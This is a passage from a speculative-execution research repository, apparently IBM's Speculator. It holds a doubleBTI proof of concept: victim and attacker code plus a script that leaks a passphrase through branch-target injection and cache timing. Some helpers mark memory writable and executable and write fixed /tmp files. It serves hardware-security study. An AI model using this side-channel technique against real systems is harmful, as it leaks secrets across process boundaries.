"lea rax, [lea_array+rax*2]", 37 | "lea rax, [lea_array+rax*2]", 38 | "lea rax, [lea_array+rax*2]", 39 | "lea rax, [lea_array+rax*2]", 40 | "lea rax, [lea_array+rax*2]", 41 | "lea rax, [lea_array+rax*2]", 42 | "lea rax, [lea_array+rax*2]", 43 | "lea rax, [lea_array+rax*2]", 44 | "lea rax, [lea_array+rax*2]", 45 | "lea rax, [lea_array+rax*2]", 46 | "lea rax, [lea_array+rax*2]", 47 | "lea rax, [lea_array+rax*2]", 48 | "lea rax, [lea_array+rax*2]", 49 | "lea rax, [lea_array+rax*2]", 50 | "lea rax, [lea_array+rax*2]", 51 | "lea rax, [lea_array+rax*2]", 52 | "lea rax, [lea_array+rax*2]", 53 | "lea 
rax, [lea_array+rax*2]", 54 | "lea rax, [lea_array+rax*2]", 55 | "lea rax, [lea_array+rax*2]", 56 | "lea rax, [lea_array+rax*2]", 57 | "lea rax, [lea_array+rax*2]", 58 | "lea rax, [lea_array+rax*2]", 59 | "lea rax, [lea_array+rax*2]", 60 | "lea rax, [lea_array+rax*2]", 61 | "lea rax, [lea_array+rax*2]", 62 | "lea rax, [lea_array+rax*2]", 63 | "lea rax, [lea_array+rax*2]", 64 | "lea rax, [lea_array+rax*2]", 65 | "lea rax, [lea_array+rax*2]", 66 | "lea rax, [lea_array+rax*2]", 67 | "lea rax, [lea_array+rax*2]", 68 | "lea rax, [lea_array+rax*2]", 69 | "lea rax, [lea_array+rax*2]", 70 | "lea rax, [lea_array+rax*2]", 71 | "lea rax, [lea_array+rax*2]", 72 | "lea rax, [lea_array+rax*2]", 73 | "lea rax, [lea_array+rax*2]", 74 | "lea rax, [lea_array+rax*2]", 75 | "lea rax, [lea_array+rax*2]", 76 | "lea rax, [lea_array+rax*2]", 77 | "lea rax, [lea_array+rax*2]", 78 | "lea rax, [lea_array+rax*2]", 79 | "lea rax, [lea_array+rax*2]", 80 | "lea rax, [lea_array+rax*2]", 81 | "lea rax, [lea_array+rax*2]", 82 | "lea rax, [lea_array+rax*2]", 83 | "lea rax, [lea_array+rax*2]", 84 | "lea rax, [lea_array+rax*2]", 85 | "lea rax, [lea_array+rax*2]", 86 | "lea rax, [lea_array+rax*2]", 87 | "lea rax, [lea_array+rax*2]", 88 | "lea rax, [lea_array+rax*2]", 89 | "lea rax, [lea_array+rax*2]", 90 | "lea rax, [lea_array+rax*2]", 91 | "lea rax, [lea_array+rax*2]", 92 | "lea rax, [lea_array+rax*2]", 93 | "lea rax, [lea_array+rax*2]", 94 | "lea rax, [lea_array+rax*2]", 95 | "lea rax, [lea_array+rax*2]", 96 | "lea rax, [lea_array+rax*2]", 97 | "lea rax, [lea_array+rax*2]", 98 | "lea rax, [lea_array+rax*2]", 99 | "lea rax, [lea_array+rax*2]", 100 | "lea rax, [lea_array+rax*2]", 101 | "lea rax, [lea_array+rax*2]", 102 | "lea rax, [lea_array+rax*2]", 103 | "lea rax, [lea_array+rax*2]", 104 | "lea rax, [lea_array+rax*2]", 105 | "lea rax, [lea_array+rax*2]", 106 | "lea rax, [lea_array+rax*2]", 107 | "lea rax, [lea_array+rax*2]", 108 | "lea rax, [lea_array+rax*2]", 109 | "lea rax, [lea_array+rax*2]", 110 
| "lea rax, [lea_array+rax*2]", 111 | "lea rax, [lea_array+rax*2]", 112 | "lea rax, [lea_array+rax*2]", 113 | "lea rax, [lea_array+rax*2]", 114 | "lea rax, [lea_array+rax*2]", 115 | "lea rax, [lea_array+rax*2]", 116 | "lea rax, [lea_array+rax*2]", 117 | "lea rax, [lea_array+rax*2]", 118 | "lea rax, [lea_array+rax*2]", 119 | "lea rax, [lea_array+rax*2]", 120 | "lea rax, [lea_array+rax*2]", 121 | "lea rax, [lea_array+rax*2]", 122 | "lea rax, [lea_array+rax*2]", 123 | "lea rax, [lea_array+rax*2]", 124 | "lea rax, [lea_array+rax*2]", 125 | "lea rax, [lea_array+rax*2]", 126 | "lea rax, [lea_array+rax*2]", 127 | "lea rax, [lea_array+rax*2]", 128 | "lea rax, [lea_array+rax*2]", 129 | "lea rax, [lea_array+rax*2]", 130 | "lea rax, [lea_array+rax*2]", 131 | "lea rax, [lea_array+rax*2]", 132 | "lea rax, [lea_array+rax*2]", 133 | "lea rax, [lea_array+rax*2]", 134 | "lea rax, [lea_array+rax*2]", 135 | "lea rax, [lea_array+rax*2]", 136 | "lea rax, [lea_array+rax*2]", 137 | "lea rax, [lea_array+rax*2]", 138 | "lea rax, [lea_array+rax*2]", 139 | "lea rax, [lea_array+rax*2]", 140 | "lea rax, [lea_array+rax*2]", 141 | "lea rax, [lea_array+rax*2]", 142 | "lea rax, [lea_array+rax*2]", 143 | "lea rax, [lea_array+rax*2]", 144 | "lea rax, [lea_array+rax*2]", 145 | "lea rax, [lea_array+rax*2]", 146 | "lea rax, [lea_array+rax*2]", 147 | "lea rax, [lea_array+rax*2]", 148 | "lea rax, [lea_array+rax*2]", 149 | "lea rax, [lea_array+rax*2]", 150 | "lea rax, [lea_array+rax*2]", 151 | "lea rax, [lea_array+rax*2]", 152 | "lea rax, [lea_array+rax*2]", 153 | "lea rax, [lea_array+rax*2]", 154 | "lea rax, [lea_array+rax*2]", 155 | "lea rax, [lea_array+rax*2]", 156 | "lea rax, [lea_array+rax*2]", 157 | "lea rax, [lea_array+rax*2]", 158 | "lea rax, [lea_array+rax*2]", 159 | "lea rax, [lea_array+rax*2]", 160 | "lea rax, [lea_array+rax*2]", 161 | "lea rax, [lea_array+rax*2]", 162 | "lea rax, [lea_array+rax*2]", 163 | "lea rax, [lea_array+rax*2]", 164 | "lea rax, [lea_array+rax*2]", 165 | "lea rax, 
[lea_array+rax*2]", 166 | "lea rax, [lea_array+rax*2]", 167 | "lea rax, [lea_array+rax*2]", 168 | "lea rax, [lea_array+rax*2]", 169 | "lea rax, [lea_array+rax*2]", 170 | "lea rax, [lea_array+rax*2]", 171 | "lea rax, [lea_array+rax*2]", 172 | "lea rax, [lea_array+rax*2]", 173 | "lea rax, [lea_array+rax*2]", 174 | "lea rax, [lea_array+rax*2]", 175 | "lea rax, [lea_array+rax*2]", 176 | "lea rax, [lea_array+rax*2]", 177 | "lea rax, [lea_array+rax*2]", 178 | "lea rax, [lea_array+rax*2]", 179 | "lea rax, [lea_array+rax*2]", 180 | "lea rax, [lea_array+rax*2]", 181 | "lea rax, [lea_array+rax*2]", 182 | "lea rax, [lea_array+rax*2]", 183 | "lea rax, [lea_array+rax*2]", 184 | "lea rax, [lea_array+rax*2]", 185 | "lea rax, [lea_array+rax*2]", 186 | "lea rax, [lea_array+rax*2]", 187 | "lea rax, [lea_array+rax*2]", 188 | "lea rax, [lea_array+rax*2]", 189 | "lea rax, [lea_array+rax*2]", 190 | "lea rax, [lea_array+rax*2]", 191 | "lea rax, [lea_array+rax*2]", 192 | "lea rax, [lea_array+rax*2]", 193 | "lea rax, [lea_array+rax*2]", 194 | "lea rax, [lea_array+rax*2]", 195 | "lea rax, [lea_array+rax*2]", 196 | "lea rax, [lea_array+rax*2]", 197 | "lea rax, [lea_array+rax*2]", 198 | "lea rax, [lea_array+rax*2]", 199 | "lea rax, [lea_array+rax*2]", 200 | "lea rax, [lea_array+rax*2]", 201 | "lea rax, [lea_array+rax*2]", 202 | "lea rax, [lea_array+rax*2]", 203 | "lea rax, [lea_array+rax*2]", 204 | "lea rax, [lea_array+rax*2]", 205 | "lea rax, [lea_array+rax*2]", 206 | "lea rax, [lea_array+rax*2]", 207 | "lea rax, [lea_array+rax*2]", 208 | "lea rax, [lea_array+rax*2]", 209 | "lea rax, [lea_array+rax*2]", 210 | "lea rax, [lea_array+rax*2]", 211 | "lea rax, [lea_array+rax*2]", 212 | "lea rax, [lea_array+rax*2]", 213 | "lea rax, [lea_array+rax*2]", 214 | "lea rax, [lea_array+rax*2]", 215 | "lea rax, [lea_array+rax*2]", 216 | "lea rax, [lea_array+rax*2]", 217 | "lea rax, [lea_array+rax*2]", 218 | "lea rax, [lea_array+rax*2]", 219 | "lea rax, [lea_array+rax*2]", 220 | "lea rax, [lea_array+rax*2]", 
221 | "lea rax, [lea_array+rax*2]", 222 | "lea rax, [lea_array+rax*2]", 223 | "lea rax, [lea_array+rax*2]", 224 | "lea rax, [lea_array+rax*2]", 225 | "lea rax, [lea_array+rax*2]", 226 | "lea rax, [lea_array+rax*2]", 227 | "lea rax, [lea_array+rax*2]", 228 | "lea rax, [lea_array+rax*2]", 229 | "lea rax, [lea_array+rax*2]", 230 | "lea rax, [lea_array+rax*2]", 231 | "lea rax, [lea_array+rax*2]", 232 | "lea rax, [lea_array+rax*2]", 233 | "lea rax, [lea_array+rax*2]", 234 | "lea rax, [lea_array+rax*2]", 235 | "lea rax, [lea_array+rax*2]", 236 | "lea rax, [lea_array+rax*2]", 237 | "lea rax, [lea_array+rax*2]", 238 | "lea rax, [lea_array+rax*2]", 239 | "lea rax, [lea_array+rax*2]", 240 | "lea rax, [lea_array+rax*2]", 241 | "lea rax, [lea_array+rax*2]", 242 | "lea rax, [lea_array+rax*2]", 243 | "lea rax, [lea_array+rax*2]", 244 | "lea rax, [lea_array+rax*2]", 245 | "lea rax, [lea_array+rax*2]", 246 | "lea rax, [lea_array+rax*2]", 247 | "lea rax, [lea_array+rax*2]", 248 | "lea rax, [lea_array+rax*2]", 249 | "lea rax, [lea_array+rax*2]", 250 | "lea rax, [lea_array+rax*2]", 251 | "lea rax, [lea_array+rax*2]", 252 | "lea rax, [lea_array+rax*2]", 253 | "lea rax, [lea_array+rax*2]", 254 | "lea rax, [lea_array+rax*2]", 255 | "lea rax, [lea_array+rax*2]", 256 | "lea rax, [lea_array+rax*2]", 257 | "lea rax, [lea_array+rax*2]", 258 | "lea rax, [lea_array+rax*2]", 259 | "lea rax, [lea_array+rax*2]", 260 | "lea rax, [lea_array+rax*2]", 261 | "lea rax, [lea_array+rax*2]", 262 | "lea rax, [lea_array+rax*2]", 263 | "lea rax, [lea_array+rax*2]", 264 | "lea rax, [lea_array+rax*2]", 265 | "lea rax, [lea_array+rax*2]", 266 | "lea rax, [lea_array+rax*2]", 267 | "lea rax, [lea_array+rax*2]", 268 | "lea rax, [lea_array+rax*2]", 269 | "lea rax, [lea_array+rax*2]", 270 | "lea rax, [lea_array+rax*2]", 271 | "lea rax, [lea_array+rax*2]", 272 | "lea rax, [lea_array+rax*2]", 273 | "lea rax, [lea_array+rax*2]", 274 | "lea rax, [lea_array+rax*2]", 275 | "lea rax, [lea_array+rax*2]", 276 | "lea rax, 
[lea_array+rax*2]", 277 | "lea rax, [lea_array+rax*2]", 278 | "lea rax, [lea_array+rax*2]", 279 | "lea rax, [lea_array+rax*2]", 280 | "lea rax, [lea_array+rax*2]", 281 | "lea rax, [lea_array+rax*2]", 282 | "lea rax, [lea_array+rax*2]", 283 | "lea rax, [lea_array+rax*2]", 284 | "lea rax, [lea_array+rax*2]", 285 | "lea rax, [lea_array+rax*2]", 286 | "lea rax, [lea_array+rax*2]", 287 | "lea rax, [lea_array+rax*2]", 288 | "lea rax, [lea_array+rax*2]", 289 | "lea rax, [lea_array+rax*2]", 290 | "lea rax, [lea_array+rax*2]", 291 | "lea rax, [lea_array+rax*2]", 292 | "lea rax, [lea_array+rax*2]" 293 | ] 294 | } 295 | -------------------------------------------------------------------------------- /examples/corr_issued_and_exec/corr_issued_and_exec_slow_lea.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 
14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: dd 1 21 | fill: times 128 db 0 22 | 23 | warmup_cnt_fake: dd 1 24 | fill2: times 128 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | lea_array times 128 db 0 29 | offset: dq 0 30 | val: dq 0 31 | len: equ $-val 32 | array: times 128 db 0 33 | ;##### DATA STARTS HERE ######## 34 | 35 | ;##### DATA ENDS HERE ######## 36 | 37 | section .text 38 | global perf_test_entry:function 39 | global snippet:function 40 | 41 | perf_test_entry: 42 | push rbp 43 | mov rbp, rsp 44 | sub rsp, len 45 | 46 | check_pinning VICTIM_PROCESS 47 | msr_open 48 | msr_seek 49 | .data: 50 | clflush [warmup_cnt] 51 | mov eax, 0 52 | cpuid 53 | lfence 54 | reset_counter 55 | start_counter 56 | cmp DWORD[warmup_cnt], 12 57 | je .else 58 | ;##### SNIPPET STARTS HERE ###### 59 | 60 | ;##### SNIPPET ENDS HERE ###### 61 | .else: 62 | lfence 63 | stop_counter 64 | 65 | inc DWORD[warmup_cnt] 66 | cmp DWORD[warmup_cnt], 13 67 | jl .data 68 | 69 | msr_close 70 | exit 0 71 | -------------------------------------------------------------------------------- /examples/doubleBTI/README.md: -------------------------------------------------------------------------------- 1 | # DoubleBTI attack using ReverseBTI gadget 2 | 3 | ## Run attack 4 | First we need to add the attacker and the victim to the tests under speculator. 5 | 6 | ``` 7 | ln -s $SPEC_H/examples/doubleBTI/dbl* $SPEC_H/tests/ 8 | 9 | cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" 10 | 11 | ninja -C $SPEC_B install 12 | ``` 13 | 14 | The we can run the script that launch the attack. Here, the script uses 15 | Speculator as orchestrator only without PMC. The data used to leak the string 16 | are output by the attacker in /tmp/attacker.output and they contain the time 17 | information for each of the array cells. 
18 | 19 | ``` 20 | zsh doubleBTI_POC.zsh 21 | ``` 22 | 23 | ## Brief attack description 24 | This test is the proof-of-concept implementation of a doubleBTI attack in which 25 | a reverseBTI gadget is used to leak data from a victim to an attacker using the 26 | Branch Predictor. 27 | 28 | In this POC the attacker can lure the victim into processing a specific character `C` of a string. 29 | Using a first BTI attack, we can have the victim execute a second indirect call 30 | based on a `fun(C)` value. The outcome of `fun(C)` is one of 256 possible values that 31 | should be mappable virtual addresses. 32 | 33 | At this point, the attacker can perform this second indirect call 34 | trained by the victim using the `fun(C)` value and observe where speculative execution 35 | lands. `fun(C)` is known to the attacker, which will map each one of the possible 36 | 256 values in its address space and instrument them with array accesses that will 37 | tell us which C was computed by the victim at the time of the call. 38 | 39 | The array for the final data access is handled entirely by the attacker, which can 40 | accurately evict each cell from memory. This guarantees a very clear signal 41 | whenever the attack completes successfully (e.g. all the indirect calls are 42 | speculatively executed by the victim). 43 | 44 | ## ReverseBTI gadget 45 | This gadget is represented by this second indirect call that the victim executes, 46 | which trains the branch predictor (BP) for the attacker. In our doubleBTI POC, the gadget follows the 47 | speculative control-flow hijack performed by a BTI attack. 48 | 49 | However, the ReverseBTI gadget is not limited to BTI speculative control-flow 50 | hijacks but can be used in combination with any speculative control-flow hijack 51 | technique. For instance, a speculative return hijack can be used in combination 52 | with ReverseBTI too. 
53 | 54 | More details available about this in our WOOT 2019 paper referenced in README.md 55 | 56 | -------------------------------------------------------------------------------- /examples/doubleBTI/dblbti_attacker.c: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include 16 | #include 17 | 18 | #include 19 | /* Walks /proc/self/maps and re-protects every mapping that starts at 0x400000 or 0x601000 as read+write+execute; exits with -1 if the maps file cannot be opened. */ 20 | void set_write_code() { 21 | long end; 22 | long start; 23 | char line[10000]; 24 | char name[10000]; /* target of the unbounded %s below; it cannot overflow here because fgets caps each line at 1000 bytes */ 25 | char dummy[10000]; /* unused */ 26 | long x; /* unused */ 27 | 28 | FILE *fp = fopen("/proc/self/maps", "r"); /* NOTE(review): fp is never fclose()d in this function */ 29 | 30 | if (fp == NULL) 31 | exit(-1); 32 | 33 | while (fgets(line, 1000, fp) != NULL) { 34 | sscanf(line, "%lx-%lx %*s %*s %*s %*s %s", &start, &end, name); /* NOTE(review): return value is ignored, so a line that fails to parse leaves start/end at their previous (initially uninitialized) values */ 35 | /* only these two hard-coded start addresses are touched; presumably the text and data segment bases of the non-PIE test binary - TODO confirm */ 36 | if (start == 0x400000 || start == 0x601000) { 37 | printf ("changing start %lx of size %lx", start, end-start); 38 | int ret = mprotect ((void*) start, (size_t) end - start, 39 | PROT_WRITE | PROT_READ | PROT_EXEC); /* the mapping becomes writable and executable at the same time (W+X) */ 40 | if (ret != 0) { 41 | printf ("ERROR\n"); /* failure is only reported; the loop keeps going */ 42 | } 43 | } 44 | } 45 | } 46 | /* Appends SIZE ints starting at val to /tmp/attacker.output, one "index) value" line each, followed by an empty line. */ 47 | #define SIZE 256 48 | void print_val(int* val) { 49 | FILE *f = fopen("/tmp/attacker.output", "a"); /* NOTE(review): result is not checked for NULL before fprintf. The fixed name in world-writable /tmp is opened with "a", which follows a pre-existing symlink; if the harness runs with elevated privileges (TODO confirm), write into a private directory or use open() with O_NOFOLLOW plus fdopen() */ 50 | int i; 51 | for (i = 0; i < SIZE; ++i) { 52 | fprintf (f, "%d) %d\n", i, *val); 53 | val++; 54 | } 55 | fprintf (f, "\n"); 56 | fclose(f); 57 | } 58 | 
-------------------------------------------------------------------------------- /examples/doubleBTI/dblbti_victim.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | %define BASE 0x10000000 ; base added to the secret-derived offset in .cont2 20 | 21 | section .data 22 | passphrase: db 'Y0U_W1ll_N0t_G3t_M3!',0 ; 20 characters followed by a NUL terminator 23 | secret_len: equ $-passphrase ; 21: the length includes the NUL 24 | input: dq 0 25 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 26 | fd: dq 0 27 | val: dq 0 28 | len: equ $-val 29 | array: resb 2048 30 | secret: db 0 ; one byte of storage; .cont2 writes it as a BYTE but reads it back as a WORD 31 | addr: dq 0 ; target pointer for the indirect call in bti_call 32 | align 1024 33 | addr2: dq 0 ; target pointer for the indirect call in gadget 34 | align 1024 35 | ;##### DATA STARTS HERE ######## 36 | 37 | ;##### DATA ENDS HERE ######## 38 | 39 | section .text 40 | global perf_test_entry:function 41 | global snippet:function 42 | global gadget:function 43 | global secret:function 44 | global correct:function 45 | global indirect:function 46 | 47 | extern usleep 48 | extern atoi 49 | extern set_write_code 50 | extern print_val 51 | extern no_arg_err 52 | extern out_of_bound 53 | ; bti_call: indirect call through the pointer stored at addr 54 | bti_call: 55 | call [addr] 56 | ret 57 | ; perf_test_entry: expects argc == 2, converts argv[1] with atoi and uses the result as an index into passphrase 58 | perf_test_entry: 59 | push rbp 60 | mov rbp, rsp 61 | mov rax, [rsp+8] ; argc 62 | cmp rax, 2 63 | je .cont 64 | call no_arg_err ; prints an error and exits (dblbti_victim.c) 65 | .cont: 66 | mov rax, [rsp+24] ; argv[1] 67 | mov QWORD[input], rax 68 | check_pinning VICTIM_PROCESS;# ATTACK_PROCESS 
69 | msr_open 70 | msr_seek 71 | .atoi: 72 | mov rax, QWORD[input] 73 | mov rdi, rax 74 | call atoi ; index = atoi(argv[1]) 75 | cmp rax, secret_len ; NOTE(review): atoi returns a 32-bit int but all of rax is compared - confirm the upper half is defined here 76 | jle .cont2 ; NOTE(review): signed <= lets a negative index and index == secret_len through; an unsigned compare with jb would reject both 77 | call out_of_bound ; prints an error and exits (dblbti_victim.c) 78 | .cont2 79 | add rax, passphrase ; rax = &passphrase[index] 80 | mov al, BYTE[rax] 81 | mov BYTE[secret], al ; keep the selected byte in secret 82 | xor rax, rax 83 | mov ax, WORD[secret] ; 16-bit load: secret plus the byte that follows it (the low byte of addr) 84 | shl eax, 16 85 | add rax, BASE ; rax = BASE + (word << 16) 86 | mov QWORD[addr2], rax ; the secret-dependent address becomes the call target used by gadget 87 | mov rdi, rax 88 | mov rsi, rax 89 | call print_val ; print_val(val, acc_time) in dblbti_victim.c writes val to /tmp/victim.output 90 | ;mov QWORD[addr2], verify <- re-direct to verify to test reverseBTI with PMC 91 | align 512 92 | 93 | victim: 94 | jmpnext256 95 | jmpnext256 96 | mov QWORD[addr], correct ; the architectural target of bti_call is the empty function correct 97 | clflush[addr] ; evicts the pointer so the call target has to be loaded from memory; presumably to lengthen the speculation window - TODO confirm 98 | lfence 99 | 100 | reset_counter 101 | start_counter 102 | .call: 103 | call bti_call 104 | 105 | stop_counter 106 | 107 | msr_close 108 | exit 0 109 | 110 | align 1024 111 | gadget: 112 | nop 113 | call [addr2] ; second indirect call, through the secret-dependent pointer; nothing in this file calls gadget directly 114 | ret 115 | lfence 116 | 117 | 118 | align 1024 119 | verify: 120 | mov DWORD[array], eax 121 | mov DWORD[array+4], edx 122 | movq xmm0, QWORD[array] 123 | ret 124 | 125 | align 1024 126 | correct: 127 | ret 128 | 129 | -------------------------------------------------------------------------------- /examples/doubleBTI/dblbti_victim.c: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 
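14 | 15 | #include 16 | #include 17 | 18 | #include 19 | /* Walks /proc/self/maps and re-protects every mapping that starts at 0x400000 or 0x601000 as read+write+execute; exits with -1 if the maps file cannot be opened. */ 20 | void set_write_code() { 21 | char line[1000]; 22 | char name[40]; /* receives the pathname field; the scan width below must stay at sizeof(name) - 1 */ 23 | long start; 24 | long end; 25 | 26 | FILE *fp = fopen("/proc/self/maps", "r"); /* NOTE(review): fp is never fclose()d in this function */ 27 | 28 | if (fp == NULL) 29 | exit(-1); 30 | 31 | while (fgets(line, 1000, fp) != NULL) { 32 | sscanf(line, "%lx-%lx %*s %*s %*s %*d %39s", &start, 33 | &end, name); /* %39s: a mapped file's path can be longer than 39 characters and an unbounded %s would write past name[40]. NOTE(review): the return value is still ignored, so a line that fails to parse leaves start/end at their previous values */ 34 | /*printf ("considering start %lx\n", start);*/ 35 | if (start == 0x400000 || start == 0x601000) { 36 | /*printf ("changing start %lx of size %lx", start, end-start);*/ 37 | int ret = mprotect ((void*) start, (size_t) end - start, 38 | PROT_WRITE | PROT_READ | PROT_EXEC); /* the mapping becomes writable and executable at the same time (W+X) */ 39 | if (ret != 0) { 40 | printf ("ERROR\n"); /* failure is only reported; the loop keeps going */ 41 | } 42 | } 43 | } 44 | } 45 | /* Overwrites /tmp/victim.output with val printed in hex; acc_time is unused. val is an int, so only the low 32 bits of the address passed by the assembly caller are printed. */ 46 | void print_val(int val, int acc_time) { 47 | FILE *f = fopen("/tmp/victim.output", "w"); /* NOTE(review): result is not checked for NULL before fprintf; the fixed name in world-writable /tmp follows a pre-existing symlink, which matters if the harness runs with elevated privileges (TODO confirm) */ 48 | fprintf (f,"sectret based address %x\n", val); 49 | fclose(f); 50 | 51 | } 52 | /* Reports a missing or wrong argument and terminates the process with status -1. */ 53 | void no_arg_err() { 54 | printf ("Error, no parameters or wrong parameters given to program\n"); 55 | exit(-1); 56 | } 57 | /* Reports an out-of-range index and terminates the process with status -1. */ 58 | void out_of_bound() { 59 | printf ("The value provided is out of bound\n"); 60 | exit(-1); 61 | } 62 | -------------------------------------------------------------------------------- /examples/doubleBTI/doubleBTI_POC.zsh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # Copyright 2021 IBM Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 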
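15 | # Orchestrates the doubleBTI run: one speculator_mon invocation per index 0..19, then a summary of the attacker's timing output for that index. 16 | if (( ${+SPEC_I} )) then 17 | echo -e "\e[33mSPEC_I is set to ${SPEC_I}\e[39m" 18 | else 19 | echo -e "\e[31mERROR: SPEC_I must be properly set\e[39m" 20 | exit 1 # non-zero status so a caller can detect the missing SPEC_I (a bare exit returned the status of the echo above, i.e. 0) 21 | fi 22 | 23 | echo -e "\e[33mCreating doublebti_res \e[39m" 24 | mkdir -p /tmp/doublebti_res # NOTE(review): fixed, predictable path under world-writable /tmp; mkdir -p also accepts a directory that already exists and belongs to someone else 25 | 26 | echo -e "\e[33mCleaning doublebti_res \e[39m" 27 | setopt +o nomatch # presumably keeps the glob below from aborting the script when the directory is empty - TODO confirm 28 | rm -rf /tmp/doublebti_res/* 29 | 30 | echo -e "\e[33mRemoving previous generated attacker.out from tmp \e[39m" 31 | rm -f /tmp/attacker.output 32 | # j is handed to the victim through --vpar 33 | for j ({0..19}) do 34 | $SPEC_I/speculator_mon -v $SPEC_I/tests/dblbti_victim/dblbti_victim \ 35 | -a $SPEC_I/tests/dblbti_attacker/dblbti_attacker \ 36 | -o $SPEC_I/results/speculator.output \ 37 | --vpar $j \ 38 | -r 100 \ 39 | -c $SPEC_I/speculator.json \ 40 | -m 41 | # for every cell index, count the samples in attacker.output that are numeric and below 80; {0..256} covers 257 indices while dblbti_attacker.c writes SIZE = 256 entries per call 42 | for x ({0..256}); do 43 | cat /tmp/attacker.output | grep "^$x)" | cut -d " " -f 2 | awk '{if($1==$1+0 && $1<80)print $1}' | wc -l 44 | done | nl -nln --starting-line-number=0 > /tmp/tmp.res 45 | # print, as a character, each index that had at least one such sample 46 | cat /tmp/tmp.res | awk '{if ($2>0) printf "\033[32m%c\033[0m ", $1}' 47 | # print X when no index had any 48 | cat /tmp/tmp.res | awk '{sum+=$2;} END{if (sum==0) printf("\033[31mX\033[0m ")}' 49 | 50 | mv /tmp/attacker.output /tmp/doublebti_res/attacker_$j.output 51 | done 52 | -------------------------------------------------------------------------------- /examples/mpx/mpx.asm: -------------------------------------------------------------------------------- 1 | i; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 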
12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "signals.inc" 18 | %include "pmc.inc" 19 | 20 | %macro setup_mpx 0 21 | ; read cpu state first 22 | mov eax, DWORD(0x18) ; lower 32bit of mask 23 | mov edx, 0 ; higher 32bit of mask 24 | mov rdi, xstate 25 | xrstor64 [rdi] 26 | ; set mpx params in memory 27 | mov rdx, 0x10 28 | mov [xstate+0x200], rdx ; xsave_buf->xsave_hdr.xstate_bv = 0x10; 29 | mov rdx, 0x1 ; 1 << MPX_ENABLE_BIT_NO 30 | or rdx, 0x2 ; 1 << BNDPRESERVE_BIT_NO 31 | mov [xstate+0x400], rdx ; // enable mpx xsave_buf->bndcsr.cfg_reg_u = ... 32 | xor rdx, rdx 33 | mov [xstate+0x408], rdx ; xsave_buf->bndcsr.status_reg = 0; 34 | ; write cpu state 35 | mov eax, DWORD(0x10) ; lower 32bit of mask we want to write 36 | mov edx, 0 ; higher 32bit 37 | mov rdi, xstate 38 | xrstor64 [rdi] 39 | %endmacro 40 | 41 | ; sys_rt_sigaction - alter an action taken by a process 42 | ; @sig: signal to be sent 43 | ; @act: new sigaction 44 | ; @oact: used to save the previous sigaction 45 | ; @sigsetsize: size of sigset_t type 46 | 47 | %macro setup_signal_handler 0 48 | mov QWORD [sigaction.sa_handler], handler 49 | mov QWORD [sigaction.sa_restorer], restorer 50 | mov eax, SA_RESTART | SA_RESTORER | SA_SIGINFO 51 | mov DWORD [sigaction.sa_flags], eax 52 | mov rax, SYS_RT_SIGACTION ; system call number 53 | mov rdi, SIGSEGV ; signal number 54 | lea rsi, [sigaction] ; sigaction struct 55 | xor rdx, rdx ; save 